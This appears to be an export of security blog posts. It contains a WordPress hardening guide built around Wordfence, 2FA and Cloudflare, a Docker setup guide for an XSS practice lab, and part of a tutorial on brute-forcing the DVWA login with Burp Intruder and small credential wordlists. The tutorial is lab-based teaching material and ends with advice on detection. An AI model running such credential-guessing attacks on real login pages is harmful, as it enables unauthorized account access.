If yes, it will automatically update for you.\nThe above option is very helpful.\nDefault themes provided by WordPress are rigorously tested for security vulnerabilities along with the core.\nSimilarly, navigate to “Appearance” -> “Theme”, select the theme, and click on “Theme Details” for the one that you are using.\nFigure 5: WordPress Theme Update You can manually update or just click on the “Enable auto-updates” link. I hope you’re just using the default theme directly provided by the vendor without any customization.\nDeactivate Unnecessary or Unused Plugins that came by default # When we spin up a self-hosted WordPress website, we usually use prebuilt templates provided by the cloud providers or the hosting providers. In any of those cases, WordPress does come with some pre-installed plugins, but some of them might not be useful in most cases. You can just deactivate those plugins or delete them completely if they are not of much help.\nNavigate to the “Plugins” section in the dashboard, select the “Active” plugins list, and click on the “Deactivate” link for all the plugins that are not very useful to you.\nFigure 6: Deactivate Unused WordPress Plugin Even after the plugin is deactivated, the code is still present and using your storage space on the disk. The database entries will still be there.\nIf the plugin does not have any important data, you can go ahead and delete it. It will delete all the files and data related to it from the database as well.\nWarning: Avoid the below step if you haven’t backed up your data. Backups can help you to restore if needed. If you think the plugin is no longer needed, you can go ahead and delete it completely.
Click on the “Inactive” filter from the “Plugins” dashboard and click “Delete”.\nFigure 7: Delete Inactive Plugins The above step is one of the ways in which you can reduce the attack surface of your website. Not only that, but this step can also improve the performance of your website.\nDelete Unused Themes that came by default # You can keep an unused theme if you are using it for testing or for other purposes. But I believe there is no point in maintaining a feature that we don’t use.\nNavigate to “Appearance” -> “Theme,” select the theme, and click on “Theme Details” for the one that you are no longer using.\nFigure 8: Delete Inactive Theme At the bottom of the Theme Details, you can just click on the “Delete” button.\nQualities to Check with Your Hosting Provider # The vendor provides the most recent stable version of WordPress Core and the latest version of all the underlying tech stack. Provides reliable methods for backup and recovery of your data as and when needed. Ensures secure communication between the Client and the Server (e.g., TLS). Transparency in communications in case of any security incidents. Ensures your site availability. Ability to discuss any of your security concerns with the support team. 🖥️ Website owners must take care of the above in the case of a self-managed site. Use HTTPS Secure Communication Protocol # Ensure your WordPress website is enabled with Transport Layer Security (TLS), i.e., HTTPS enabled. Older versions are referred to as SSL.\nHTTPS runs on port 443 by default. (You can change it to any port.) HTTP runs on port 80 by default.
One of the major drawbacks of the HTTP protocol is that anyone on your network can view and monitor all your activity, including sensitive information like usernames, passwords, etc.\nHTTPS prevents attackers from viewing or tampering with Client-Server communication. It transmits and receives all your communications through a secure channel.\nEnsure HTTPS is enabled and that your site only listens for HTTPS communications. To verify, navigate to the WordPress Dashboard –> Settings –> General.\nCheck that the WordPress Address (URL) and Site Address (URL) are set with the https prefix as displayed below.\nFigure 9: WordPress Site with HTTPS Configured If you are unable to update it from the portal, you might need to change it accordingly in the wp-config.php configuration file.\nAdditionally, you can go ahead and add a rule in the firewall to disable all communications on HTTP port 80 and redirect all traffic to HTTPS port 443.\nLet’s verify our site is accessible over HTTPS and has a valid certificate.\nFigure 10: Verifying the site TLS Certificate Sometimes, the vendor might already have enabled it or provided you with the necessary information to do so. Refer to your vendor documentation for instructions.\nUsing WordPress Security Plugins # The built-in options for securing a WordPress site are limited. This is where third-party plugins and SASE-based firewalls come to our rescue. In this section, I will focus only on one WordPress security plugin, which is freely available and offers more options.\nI will use Wordfence for the examples below. There is no silver bullet in security. You are free to explore other alternative plugins, both free and paid, listed below.\nShield Security, Sucuri, All-In-One Security, Solid Security, and others. Pick one that aligns closely with your requirements. Remember, trust and reliability are the most important factors when choosing a security plugin.
Check out their reviews and support information, too.\nWhy did I choose Wordfence? # A good number of security hardening features are available for free, which can help you quickly start securing your website. It offers malware scanning for free. ❗The malware scanning rules are updated monthly in the free version, and real-time protection is available in the premium version. It continuously updates the vulnerabilities database. Wordfence Installation # Ensure the Wordfence WordPress plugin is installed and configured. Continue to the next section if you have already installed it.\nAdmin Login: Enable Two-Factor Authentication # The first step is to secure the WordPress site’s login mechanism. This will ensure only authorized users are logged into the portal and deny all others by default.\nThis is not limited to the admin user account. It can be enabled for all the user accounts and roles that are critical for your business operations.\nTo get started, log into the WordPress admin dashboard.\nFigure 11: Wordfence Enable Two-Factor Authentication On the left side of the WordPress admin menu, click on “Wordfence”. Navigate to “Login Security”. The Wordfence “Two-Factor Authentication (2FA)” screen will be loaded with instructions for setting up the 2FA. The 2FA provided here is based on a mobile application. You can register with any of the Time-based One-time Password (TOTP) apps, such as Google Authenticator, FreeOTP, Authy, etc. The full list of supported apps can be found here.\nIn the above screenshot, “user” is my admin account, and I will enable 2FA for it. Using any one of the TOTP-based apps, scan the code and ensure the entry is added to your 2FA app.
After adding an entry, download and save the Recovery Codes in a safe location; they can be used when the TOTP code is unavailable. Enter the TOTP code displayed on your mobile app to verify that it’s reflecting correctly and syncing properly with the server. Click on the “Activate” button to ensure your 2FA is added successfully. I hope you have saved your recovery codes safely. After adding 2FA to your admin account, the next screen will display your 2FA status.\nFigure 12: Wordfence 2FA Status - Logged-in user Displays information about the Two-Factor Authentication: the 2FA status of the currently logged-in user (i.e., user) and an option to deactivate. If your recovery codes are compromised or lost, or if you have used all the previous codes, you can generate a new set of recovery codes by clicking on “Generate New Codes”. Verifying Two-Factor Authentication # Let’s go ahead and verify the 2FA which we have newly created. Launch a new incognito window and visit your WordPress admin login page.\nA login window appears, the same as how you used to log in earlier. Just enter the valid admin username and password. Immediately, you will be taken to a 2FA authentication page.\nFigure 13: Wordfence 2FA Verification Enter the code from your mobile app for Wordfence and ensure everything works successfully. This will confirm that you have successfully set up 2FA authentication for your admin account.\nUpdating 2FA Settings # In the WordPress dashboard, visit “Wordfence” -> “Login Security” and click on the “Settings” tab. Figure 14: Wordfence - 2FA settings You can view the summary of user accounts and update the 2FA policy for your WordPress portal. I have required 2FA for all admin accounts and left it optional for other users.
Enable 2FA for WooCommerce # If you are using WooCommerce, ensure that the 2FA support is extended to WooCommerce users as well.\nFigure 15: Wordfence - Options for WooCommerce 2FA Enable reCaptcha # In the Wordfence “Login Security” settings, you can also find the option to enable “reCaptcha”, which verifies that it is a human who is trying to log in or register before the form is submitted.\nFigure 16: Wordfence - Login Settings - reCaptcha This will help you defend against brute-force attacks.\nEnsure reCaptcha is checked, and make sure to update the Site Key and Secret provided by your Google account after registering. You can register for reCaptcha by logging in with your Google account here. The score threshold controls how strictly a visitor is checked to decide whether it’s a human or a bot. It’s good to start with the default. 1.0 is considered the strictest, and 0.0 is the least strict. Please also consider user convenience. Perform strict checks based on the criticality of the data you are dealing with. Verify reCaptcha # Once Google reCaptcha is enabled, you will see the captcha icon at the bottom of the WordPress admin login page and user registration page.\nFrom now on, it will verify and ensure that only humans can fill out and submit the forms on your website.\nFigure 18: Google reCaptcha Limits Check 💲 Remember, Google reCaptcha has a limit on the number of free assessments that can be done. Beyond the limit, it will be charged monthly.\nUsing the above settings, you can prevent brute-force attacks on your website.\nStrengthen Wordfence Firewall Settings # Imagine if any of the user accounts on the website used a weak password or a guessable password from a dictionary.
It would be easy for attackers to brute-force the password and take over the account.\nThis is one of the common attacks on WordPress, and you might continuously see brute-force attempts on your website.\n2FA login security can prevent attacks to an extent, but what about accounts that do not have 2FA enabled?\nLet’s go ahead and tighten the security for those accounts as well.\nEnforce a Strong Password Policy\nIn the WordPress admin dashboard, navigate to “Wordfence”, and select “All Options” from the left side menu.\nThe Wordfence “All Options” page will be loaded as displayed below.\nClick and expand the “Brute Force Protection” section.\nEnsure “Brute Force Protection” is enabled. Scroll down to the “Additional Options” section and ensure the “Enforce strong passwords” option is checked. Set it to “Force all members to use strong passwords” from the dropdown menu. Make sure to click on “Save Changes”. These options should already be enabled by default in Wordfence, but it’s good to verify. Going ahead, Wordfence will ensure that all user accounts are set with strong passwords.\nEnforcing Account Lockout - Limiting Login Attempts\nOn the same page, we can also update the Account Lockout policy settings.\nThe default Account Lockout settings provided by Wordfence are a good limit.
You can proceed with it.\nIf your site is receiving a high number of brute-force attacks, you can tighten the lockout policy, as I have done on my website.\nAdditionally, I have selected the option to “Prevent the use of passwords leaked in data breaches”, which prevents admins from using leaked passwords.\n💡Do not lock yourself out of the WordPress portal.\nWordfence Firewall - IP Whitelist\nTo prevent yourself from being locked out of the WordPress portal, it is good to whitelist your IP address.\nClick on Wordfence in the WordPress admin dashboard. Select “All Options” to list all the Wordfence options available. The application loads the “All Options” page. Click and expand “Advanced Firewall Options”. In the “Allowed IP addresses that bypass all rules” field, enter your public IP address. Click on “Save Changes” to ensure the changes are persistent. Using the above option, you can ensure that you are not locking yourself out. The same option can be used to whitelist the IP addresses used for security audits as well.\nEnsure the Web Application Firewall is Enabled\nUsing a firewall is one way to control what traffic must be allowed and what needs to be blocked from reaching your website. Web Application Firewalls (WAFs) can filter out suspicious traffic coming from the internet.\nThese WAFs are continuously updated with the patterns used by attackers to compromise websites, which are called rulesets.\nThis feature is also available in the Wordfence plugin.
The free version of the Wordfence plugin will check for and stop complex threats.\n🤖It is important to regularly update and review your firewall settings to ensure that your website’s security remains strong and up-to-date.\nThe Wordfence dashboard provides you with the information you need about firewall settings and alerts as well.\nAfter logging into the WordPress admin account, click on the “Wordfence” plugin on the left side. Click on the “Firewall” link on the left-side menu. The “Wordfence Dashboard” will be loaded as displayed in the above screenshot. Click on “Manage Firewall” to check out all its settings and options. The firewall options page will be loaded and is displayed below.\nFrom the above screenshot, you can understand that the community edition (i.e., the free version) stops the complex attacks, and its ruleset updates are delayed by 30 days compared to the premium edition.\nClick and expand the “Basic Firewall Options”. When you set up the “Wordfence” plugin, it starts in “Learning Mode”. In this mode, it tries to understand how your plugins and themes work and what their expected behaviour is. After the learning mode, it will automatically switch to “Enabled and Protecting” mode.
You could also change it by clicking on the drop-down menu.\nOn the same page, click and expand “Advanced Firewall Options” and scroll down; you will be able to see the firewall rules enabled on your website.\nThese are the rulesets that check for attack patterns of web application vulnerabilities like XSS, SQLi, File Upload, XXE, etc.\nIf an attacker tries to exploit an XSS vulnerability on your website, the Firewall’s XSS rule is triggered, and that particular attempt is blocked immediately.\nLet’s check the Wordfence Firewall in action. I will just key in a sample XSS payload, and let’s see how it behaves.\nThe above screenshot demonstrates that our firewall is active and blocking the XSS attempt with an HTTP 403 Forbidden response and a custom warning message from the Wordfence plugin.\nIf you have authorized a security professional to carry out a security assessment on your website, whitelist the IP address of the authorized professional and remove it when the assessment is complete.\nI hope the above options can help you get started. At any point, you could opt for a premium service or seek professional assistance when needed.\nAvoid Nulled WordPress Plugins or Themes\nWordPress nulled plugins or themes are modified versions of premium WordPress plugins distributed for free or at a negligible cost over the Internet through unofficial channels that anyone can download and use.\nIt might seem like a good deal to use them without paying, but it does come with a few security risks.
To learn more about it, check out the bookmark below.\nhttps://securityarray.io/security-threats-of-nulled-wordpress-plugins-and-themes/\nWordfence Help\nAll the options I have covered above are good for helping you easily get started securing your WordPress website.\nhttps://www.wordfence.com/help/\nUsing Cloudflare Web Application Firewall\nSometimes, the website owner would like to avoid having too many plugins for multiple reasons, such as slowdowns or maintenance overhead.\nIn this case, we could opt for a cloud-based web application firewall like Cloudflare WAF, Amazon WAF, etc. These cloud-based firewalls act as proxies, monitor traffic and filter out all malicious traffic before passing it to our web server. Since everything is done in the cloud, your server is not overloaded.\nThese cloud-based firewalls act as the first line of defence and filter out OWASP Top 10 attacks, provide bot protection, block DDoS attacks, and filter malicious behaviour before allowing traffic to your server. Cloudflare has free and premium plans. The rest are premium services.\nFor the demo, we shall get started using the free option that is available. Before proceeding, I would request you to check the following link, Adding a Site to Cloudflare, and ensure your website is added to Cloudflare.\nLog into your Cloudflare account, navigate to your DNS settings and click on Records.\nIn your DNS records, look for the one pointing to your WordPress website. In my case, it is “wp.securityarray.io”.\nClick “Edit” on your DNS record, i.e., for wp.securityarray.io. Ensure the “Proxy Status” is enabled so that all your incoming traffic is proxied through Cloudflare. Click on the “Save” button to make the changes.
💡Additionally, Cloudflare also hides your server IP address from the public and has basic WAF protection, CDN capabilities, and DDoS protection enabled for your website.\nThe above configuration will ensure that all our traffic for “wp.securityarray.io” hits Cloudflare first and then reaches my server.\nWith the above, we have successfully set up basic WAF protection for our website.\nAs of today, a cheaper option for WordPress users is to use Cloudflare through Cloudways. Cloudways + Cloudflare are integrated and offer premium WAF capabilities at a lower cost.\nScan for Vulnerabilities and Malware\nAnother important aspect of WordPress security is to scan your website for any known vulnerabilities and malware at regular intervals.\nInitially, I would recommend installing and getting started with the Jetpack Protect plugin.\n🔌The Jetpack Protect plugin differs from the Jetpack plugin and is offered separately by the Jetpack team. It is important to note that there is no dependency between the Jetpack Protect plugin and the Jetpack plugin.\nThe next step would be to evaluate the different security plugins that are available in the market and choose the one that meets your requirements and needs.\nCheck out the bookmark below to learn more about the different ways to scan your WordPress website for vulnerabilities.\nWordPress Scan for Vulnerabilities: A Comprehensive Guide for Site Security - The WordPress scan for vulnerabilities article will guide you with step-by-step approaches and examples that can be implemented on your website to scan and identify vulnerabilities. Also, additional information about security measures, tools, and plugins is available. (SecurityArray, Raghunath)\nInstall only reputable and trusted plugins. I recommend checking the plugins’ reviews and support information before choosing one.\nMonitoring and Responding to Security Threats\nA good amount of context has been covered in securing the WordPress website.
Hardening the WordPress Site is not a one-time effort.\nYou would need to dedicate some time to monitoring it continuously, whether daily, weekly, or monthly, based on the severity of the data you are handling.\n\u0026ldquo;Security is a process, not a product.\u0026rdquo; By: Bruce Schneier\nAdvantages of Monitoring\nHelps to keep your website free from malware. You stay aware of the latest threats and keep the WordPress core and plugins updated. Recognize breaches early. You could also opt for updates through email notifications. Wordfence Scan\nA good amount of monitoring for security threats can be done with the help of the Wordfence plugin itself.\nIn the WordPress admin dashboard, click and select \u0026ldquo;Wordfence\u0026rdquo;. Click on the \u0026ldquo;Scan\u0026rdquo; link. The \u0026ldquo;Scan\u0026rdquo; section will be loaded and displayed as shown above. You can start the scan by clicking on the \u0026ldquo;Start New Scan\u0026rdquo; button at any time on demand. It is generally scheduled to run every 24 hours. For more information, click on \u0026ldquo;Scan Options and Scheduling\u0026rdquo;. Wordfence Scan will check for the Server State, File Changes, Malware Scan, Content Safety, Public Files, Password Strength, Vulnerability Scan, and User \u0026amp; Option Audit related files. Additionally, it will display warnings if any are found on your website. Results information will be displayed. Just double-click on the result item or click on the details button on the result. It will provide you with more information.\nFor each result, you can understand the problem and how to address it. If you think any of the results is a \u0026ldquo;False Positive\u0026rdquo;, you can click on the Ignore button.\nPerforming all the above actions can help you reduce attacks and secure the website to a good extent. 
You can always seek professional services if additional needs arise.\nTroubleshooting # My Website becomes slow when using Wordfence # This is one of the performance impacts that can be witnessed on some of the WordPress websites. One option is to set \u0026ldquo;Low resource scanning\u0026rdquo;.\nTo do this, navigate to \u0026ldquo;Wordfence\u0026rdquo; -\u0026gt; \u0026ldquo;Scan\u0026rdquo; -\u0026gt; Scanner Options and Scheduling -\u0026gt; Performance Option -\u0026gt; Ensure \u0026ldquo;Use low resource scanning (reduces server load by lengthening the scan duration)\u0026rdquo; is enabled and checked.\nAnother option could be to use premium solutions like Sucuri or check Cloudflare WAF solutions.\nI think my website has been Hacked. # Try using a couple of options, like cleaning and reinstalling the latest versions of all the plugins. Scan with malware analysis plugins like Wordfence, Sucuri, etc. If the issue persists, seek professional assistance.\nConclusion # In conclusion, website security is of utmost importance, especially for WordPress website owners. With the increasing number of cyber threats, it\u0026rsquo;s crucial to take proactive measures to protect your online assets.\nWordfence is a security plugin that is freely available for WordPress and provides a wide range of features to enhance your website\u0026rsquo;s security. Free plugins always come with limitations. It is good to get started with, but when demand increases, you might need to opt for premium options with dedicated support.\nBy following the steps outlined in this guide, you can configure Wordfence and its settings to keep your website safe from potential threats such as malware, brute force attacks, and more.\nAdditionally, keep monitoring the WordPress security news and take action accordingly. 
Don\u0026rsquo;t wait until it\u0026rsquo;s too late \u0026ndash; take the necessary steps to secure your website today.\nAdditional Checklists and References: # WordPress Security JetPack - The Only WordPress Security Checklist The Ultimate WordPress Security Checklist The Ultimate WordPress Security Checklist - Cloudways ","date":"20 March 2024","externalUrl":null,"permalink":"/enhancing-the-security-of-wordpress-sites-best-practices-and-tips/","section":"Posts","summary":"","title":"Enhancing the Security of WordPress Sites: Best Practices and Tips","type":"posts"},{"content":"You would like to learn more about what a cross-site scripting vulnerability is and how it can be exploited with examples. This is the right place for you. I have compiled short lessons on the cross-site scripting (XSS) vulnerability with trial testing scenarios close to real-world ones, which can help you get started with real-world applications.\nLet\u0026rsquo;s start by setting up the lab environment needed for practicing XSS, and upcoming articles will cover the theory and step-by-step approach for identifying the vulnerability.\nKurukshetra - An XSS-vulnerable app by design # In the author\u0026rsquo;s own words, \u0026ldquo;Kurukshetra is a vulnerable lab geared towards practicing XSS challenges.\u0026rdquo;\nThe app\u0026rsquo;s goal is to give you hands-on experience in identifying the XSS vulnerability in different ways and also keep you updated about the theory and basics needed.\nCheck out the GitHub - D4rk36/Kurukshetra for more info.\nAll the content provided here is only for educational purposes. Authors, Application Creators or Web Site Owners are not responsible for misuse of your knowledge. You are responsible for your own actions!\nThe Kurukshetra app isn\u0026rsquo;t for production use! 
Only for testing and learning on a host machine.\nPreparing Environment # A couple of things must be done to start working on the \u0026ldquo;Kurukshetra\u0026rdquo; XSS vulnerable application.\nDocker \u0026amp; Docker Compose must be installed and working A working OS (Linux/Windows/Mac) with network connectivity Git installed Feel free to skip to the next section if all the required tools are pre-installed.\nFor users who do not have Docker installed, please visit the Get Docker page and follow the instructions as specified.\nOnce installed, make sure Docker is working. The output of the command should be something similar to the below output.\nDocker check: # docker --version Output:\nDocker version 20.10.17, build 100c701 After installing Docker, you can set up docker-compose by referring to the given link. It is needed to build up the environment on the go.\nMake sure docker-compose is working by verifying the version information.\nDocker Compose check: # docker compose version Output:\nDocker Compose version v2.12.2 Hopefully, \u0026ldquo;git\u0026rdquo; is already installed on most systems. If you don\u0026rsquo;t have it, just go ahead and install it from your package manager or the link given below.\nGit - Download\nLab-Setup - \u0026ldquo;Kurukshetra\u0026rdquo; Application 💻 # Let\u0026rsquo;s clone the application from the GitHub repository and copy it onto your system.\ngit clone https://github.com/D4rk36/Kurukshetra.git Navigate to the downloaded directory.\ncd ./Kurukshetra Inside the directory, you will find a \u0026ldquo;docker-compose.yml\u0026rdquo; file, which contains the instructions for running the application. You have to run \u0026ldquo;docker compose up\u0026rdquo; to bring up the environment.\ndocker compose up Once the environment is up, verify it by opening the following URL in your browser: http://localhost:8066/\n💡In case you are facing any errors. 
Please re-verify all the steps from the Docker installation. The page will be displayed as shown below.\nFigure 1: Kurukshetra - XSS Challenges Page Bringing up the Docker instance might take a couple of minutes, based on your network speeds. You should also be able to see the log as displayed below while starting up.\nFigure 2: Kurukshetra Running At any time during the lab, you can press \u0026ldquo;Ctrl - c\u0026rdquo; to stop the running environment.\nAdditionally, to completely remove the \u0026ldquo;Kurukshetra\u0026rdquo; containers from your system, run the remove command from the same directory where the docker-compose.yml file is present.\ndocker compose rm Now that our lab environment is up and working, you are good to proceed to the next step of identifying the XSS vulnerabilities.\nSummary # The setup is straightforward for users who are familiar with Docker. For users who are new to Docker, you might need some time to get adapted to using it. Most of the tools are now being containerized to avoid the installation process. Just download and run with Docker.\nEnsure your lab environment is working to jump-start learning about the cross-site scripting vulnerability. The next articles will cover types of cross-site scripting vulnerabilities and techniques used to identify them. 😃\nAdditional References for XSS Practice: # https://xssy.uk/allLabs ","date":"25 November 2022","externalUrl":null,"permalink":"/xss-explained-learn-cross-site-scripting-with-examples/","section":"Posts","summary":"","title":"XSS Explained - Learn cross-site scripting with examples","type":"posts"},{"content":"Welcome to my corner of the internet, which is dedicated to all things application security, AI, Security Automation, and security awareness! 
I am happy to have you here.\nSecurityArray is an independent publishing portal that was launched in November 2022, focused on Information Security.\nDisclaimer: Strictly for Educational Purposes Only All the information provided on the site is only for educational purposes. You are responsible for your actions. The website (securityarray.net) and the author (Raghunath) are not liable for any of your/user actions.\n✉️ Connect with Me # I am available at hello at raghu dot io.\nFeel free to say \u0026ldquo;hi\u0026rdquo; or just drop a line if you have any feedback or suggestions on future content, etc.\n🙏 Look forward to connecting with you soon!\n","date":"14 November 2022","externalUrl":null,"permalink":"/about/","section":"SecurityArray","summary":"","title":"About Me","type":"page"},{"content":"Brute Force is one of the most commonly seen security vulnerabilities. This article will demonstrate the brute force attack on the Damn Vulnerable Web Application - an intentionally designed vulnerable application. In addition, it will cover how these attacks work, the potential impact, and effective ways to prevent them and safeguard your online security.\nThe following post is part of learning application security with the DVWA application.\nBefore jumping in, ensure the Docker DVWA application is enabled, configured, and accessible.\nWhat is a Brute Force Attack? # A brute force attack is a trial-and-error method in which every possible combination of commonly used words, usernames, and passwords is tried out, hoping any of them will work.\nBrute Force attacks are aimed at guessing commonly known files on the web server, breaking into email accounts, guessing remote service credentials such as SQL or SSH server credentials (online), cracking password hashes (offline), etc., to gain unauthorized access to sensitive data or compromise security.\nIt would require a good amount of computing resources and time. 
#️⃣\nThe screenshot below from Cloudflare demonstrates how long it can take to crack a password based on the number of characters.\nFigure 1: BruteForce Attack Statistics - Cloudflare Today\u0026rsquo;s hardware helps us crack a hashed password of 5 characters or fewer in seconds. One with 12 characters or more, combining small letters, upper-case letters, special characters, and numerics, takes years to crack. The longer the password, the more time it takes to crack using a Brute Force attack.\nThink wisely about how much time you would like to spend on any brute force attack. A day or two may be acceptable, but years and decades may not be worth it.\nSpeaking from the perspective of security assessments, we will be spending days or weeks, but attackers have all the time they want.\nHow do Brute Force attacks work? # Brute Force attacks are performed using automated tools or software. A massive list of dictionaries containing common passwords, usernames, words, etc., is generated and given to the tool as input.\nThe tool keeps interacting with the service and tries out the dictionary entries one by one until a valid match is found, at which point it stops.\nDuring this process, the attacker uses large dictionary data sets until the correct combination is discovered and successful access to confidential resources is obtained.\nFrom now on, we will use \u0026ldquo;Burp Suite\u0026rdquo; as the tool for all our brute force attacks, to keep the demos focused. 
If you would like to learn more about the basics and usage of the tool, check out the following post on BurpSuite Overview.\nNext, I will be using a small custom dictionary of usernames and passwords for fast brute-force results in the attack performed later.\nadmin administrator user john dvwa bob alice root superuser super admin admin123 password password123 user user123 administrator passw0rd r3m3mb3rM3 admin123$ Brute Force Attack - Demo # The DVWA application has a Login page functionality that can be used to brute-force and find the right match of user credentials, simulating attackers trying to compromise the application.\nLet\u0026rsquo;s go ahead and simulate the steps of an attacker and see if we can break in.\nIn information security, it\u0026rsquo;s all about chaining up every piece of information you know, experimenting with it, and confirming if it works. In short, it lies in your creativity when using the information.\nFigure 2: DVWA Brute Force - Login Page At the moment, we do not have any information about the username/password. All we see is a login page.\nWe will start with the Brute Force attack using the above dictionaries.\nLet\u0026rsquo;s start the BurpSuite tool and use the small custom dictionaries we created above. The tool tests all possible combinations, and this method is scalable to thousands of combinations.\nIn the Burp Suite tool, navigate to the \u0026ldquo;Proxy\u0026rdquo; tab and click on the \u0026ldquo;Open Browser\u0026rdquo; button. A Chromium browser will be launched and will be displayed as shown below.\nFigure 3: Burp Suite In-Built Chromium Browser Log into the DVWA application using \u0026ldquo;admin/password\u0026rdquo; and navigate to the \u0026ldquo;Brute Force\u0026rdquo; item in the menu.\nLet\u0026rsquo;s try some known username and password combinations.\nSay \u0026ldquo;administrator/admin123\u0026rdquo;, \u0026ldquo;admin/admin123\u0026rdquo;, \u0026ldquo;user/user123\u0026rdquo; etc. 
For all incorrect attempts, we keep getting the \u0026ldquo;Username and/or password incorrect.\u0026rdquo; message.\nManually trying out credentials is also known as a simple brute force attack, which is painful and limits the knowledge to oneself. This approach is time-consuming and isn\u0026rsquo;t scalable.\nIf you found a valid login match with this approach? Excellent. You perfectly guessed it. 👍\nIn Burp Suite, we need to capture the Login request. I will enable the Intercept option to capture a specific login request so we can perform automated operations using it.\nTo enable it, navigate to the Burp Suite \u0026ldquo;Proxy\u0026rdquo; tab ⇾ \u0026ldquo;Intercept\u0026rdquo; ⇾ toggle on the \u0026ldquo;intercept off\u0026rdquo; button. It immediately turns to \u0026ldquo;intercept on\u0026rdquo; as displayed below.\nFigure 4: BurpSuite Intercept \u0026ldquo;Toggle On\u0026rdquo; Key in some random data in the username and password fields, then click on the \u0026ldquo;Login\u0026rdquo; button as shown below.\nFigure 5: Key in random credentials on the Login Page Once Burp Suite receives an intercepted request, you should be able to see the highlights immediately. Navigate to the \u0026ldquo;Proxy\u0026rdquo; tab ⇾ \u0026ldquo;Intercept\u0026rdquo;. You should be able to see a request similar to the one below.\nFigure 6: Brute Force functionality Login Request An HTTP GET method is used; remember the GET method doesn\u0026rsquo;t have a message body. Therefore, all the parameters and values will be sent in the URL.\nGET /vulnerabilities/brute/?username=admin\u0026amp;password=testpassword\u0026amp;Login=Login HTTP/1.1 Here, we are trying to access a page called \u0026ldquo;/vulnerabilities/brute\u0026rdquo; and passing parameter values \u0026ldquo;username=admin\u0026amp;password=testpassword\u0026amp;Login=Login\u0026rdquo; to perform the login action required by the application.\nIf your credentials are valid, you will be able to log in successfully. 
Otherwise, you will receive an invalid login error message.\nNow, click on the \u0026ldquo;Action\u0026rdquo; button and select \u0026ldquo;Send to Intruder\u0026rdquo;.\nFigure 7: Send to Intruder Switch to the \u0026ldquo;Intruder\u0026rdquo; tab, and you should be able to see the same request there. Under the \u0026ldquo;Positions\u0026rdquo; sub-tab, the tool automatically detects where all the changeable values need to be placed and highlights the five parameter value sections for us.\nFigure 8: Request Being Used as Payload I will clear all the payload locations and select only username and password using the \u0026ldquo;Clear\u0026rdquo; and \u0026ldquo;Add\u0026rdquo; buttons beside them.\nFigure 9: Select the Positions in a Request to automate payloads with dictionaries Types of Brute Force Attacks # There are four brute-force attack types that are supported by the \u0026ldquo;Burp Suite\u0026rdquo; tool.\nFigure 10: BurpSuite Intruder Attack Types Cluster Bomb best suits our requirements. Set the attack type to \u0026ldquo;Cluster Bomb\u0026rdquo; and switch to the \u0026ldquo;Payload\u0026rdquo; sub-tab.\nFigure 11: BurpSuite Brute Force select Attack Type In the \u0026ldquo;Payloads\u0026rdquo; sub-tab, select \u0026ldquo;Payload Set 1\u0026rdquo;, set the payload type as \u0026ldquo;simple list\u0026rdquo; and paste all the contents copied from the usernames.txt list into the payload options.\nThis is for the \u0026ldquo;Username\u0026rdquo; values.\nFigure 12: Usernames Payload Second, in the \u0026ldquo;Payloads\u0026rdquo; sub-tab, select \u0026ldquo;Payload Set 2\u0026rdquo;, set the payload type as \u0026ldquo;simple list\u0026rdquo; and paste all the contents copied from the passwords.txt list into the payload options.\nThis is for the \u0026ldquo;Password\u0026rdquo; values.\nFigure 13: Password Payloads Observe that the request count is now set to 100. 
Using the two lists now, we will be trying out 100 possible combinations.\nLastly, click the \u0026ldquo;brute-force\u0026rdquo; button at the top right to initiate our brute-force attack.\nIn the BurpSuite Community edition, it prompts with a warning box as some features are limited. Click \u0026ldquo;Ok\u0026rdquo; to continue. An intruder window pops up, and the payload information and request status will be displayed below.\nIf you take a look, we can see we are getting a 200 status for each request, which means \u0026ldquo;200 Ok\u0026rdquo;.\nHow do we know which payload combination worked and which haven\u0026rsquo;t?\nOne way is to click on each request with a 200 Ok status, select the \u0026ldquo;Response\u0026rdquo; sub-tab, and search for the string \u0026ldquo;Username and/or password incorrect\u0026rdquo;. We know this belongs to a failed login attempt.\nIf the string isn\u0026rsquo;t present, it means the credentials combination worked, and that would be our match.\nFigure 14: Brute Force Intruder Attack Results BurpSuite Intruder figured out there is one positive match, shown on the bottom right side of the screenshot. This is a time-consuming approach.\nFocus on the response length as shown below. For all incorrect attempts, the response message length is the same, \u0026ldquo;4666\u0026rdquo;. Check the one with a different length, i.e., 4704.\nFigure 15: Brute Force Payload Match Found Observe whether the username/password combination \u0026ldquo;admin/password\u0026rdquo; worked. Navigate to the response sub-tab; we can see the \u0026ldquo;welcome to the password protected area of admin\u0026rdquo; message.\nHurray!! We found the right password match! 👏\nPassword Match Verification # It is always good practice to re-verify the security bug before we report it.\nMake sure all the Intercepts in the proxy tab are toggled to off. 
Then, let\u0026rsquo;s return to the brute force page and verify our match to confirm our results.\nFigure 16: Login Successful Yep, our newly found password combination worked.\nExcellent! We found a security bug using a Brute-Force attack, i.e., a guessable username and password.\nYou have learned a quick way to perform a Brute-Force attack using DVWA.\nI have used a short custom-built word list for demo purposes; give other lists a try. Search for \u0026ldquo;Brute-Force attack\u0026rdquo; or \u0026ldquo;Brute force wordlist\u0026rdquo;, and you will find many resources.\nHere are some lists from Github.\nImpact of Brute Force Attacks # The impact of a successful brute force attack can be severe.\nUnauthorized access to sensitive information. Financial loss. Loss of the organization\u0026rsquo;s reputation. Potential legal and financial repercussions for the affected individuals or organizations. Loss of customer trust, etc. Figure 17: Preventing Brute Force Attacks Preventing Brute Force Attacks # Security Researchers and web application developers need to be familiar with mitigation techniques. These skills can help them defend web applications from malicious actors.\nSo, let\u0026rsquo;s talk about some ways to detect it and then mitigate it.\nPatterns of Brute Force Attack # Some common patterns can help detect brute-force attacks on our web server.\nToo many requests originate from a single IP address within a minute or hour. Multiple logins to a single user account from different IP addresses and regions. Excessive usage of the server resources and bandwidth. Increased number of failed login attempts with various usernames and passwords. Logins to multiple user accounts from a single IP address (i.e., guessable default password), etc. 
